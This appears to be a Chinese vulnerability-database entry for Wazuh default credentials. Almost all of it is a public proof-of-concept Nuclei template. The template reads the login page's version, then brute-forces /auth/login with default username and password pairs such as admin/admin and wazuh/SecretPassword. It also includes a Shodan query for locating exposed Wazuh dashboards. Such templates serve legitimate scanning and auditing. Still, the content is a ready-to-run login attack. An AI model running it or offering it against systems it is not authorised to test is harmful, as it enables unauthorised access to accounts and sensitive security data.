漏洞描述
Wazuh contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
wazuh-default-login: Wazuh - Default Login
PoC代码[已公开]
id: wazuh-default-login
info:
name: Wazuh - Default Login
author: theamanrawat,denandz,PulseSecurity.co.nz
severity: high
description: |
Wazuh contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://documentation.wazuh.com/current/user-manual/user-administration/password-management.html
- https://wazuh.com
- https://documentation.wazuh.com/current/deployment-options/docker/wazuh-container.html#single-node-deployment
classification:
cpe: cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 7
vendor: wazuh
product: wazuh
shodan-query: "title:\"Wazuh\""
tags: wazuh,default-login,vuln
http:
- method: GET
path:
- "{{BaseURL}}/app/login"
extractors:
- type: regex
part: body
name: osd
group: 1
internal: true
regex:
- '"version":"([0-9.]+)"'
- raw:
- |
POST /auth/login HTTP/1.1
Host: {{Hostname}}
Osd-Version: {{osd}}
osd-xsrf: osd-fetch
Content-Type: application/json
{"username":"{{username}}","password":"{{password}}"}
attack: clusterbomb
payloads:
username:
- "admin"
- "wazuh"
password:
- "admin"
- "wazuh"
- "SecretPassword"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"username":'
- '"roles":'
condition: and
- type: word
part: header
words:
- 'application/json'
condition: and
- type: status
status:
- 200
# digest: 4b0a0048304602210083407589987e1ae88ecac1d92da649fa4d0884720c70f8147504769c11ee84bf022100bed1804502ceb5299469135e1b4de35cc0f39abab84f772733cdf2334c4f1b18:922c64590222798bb761d5b6d8e72950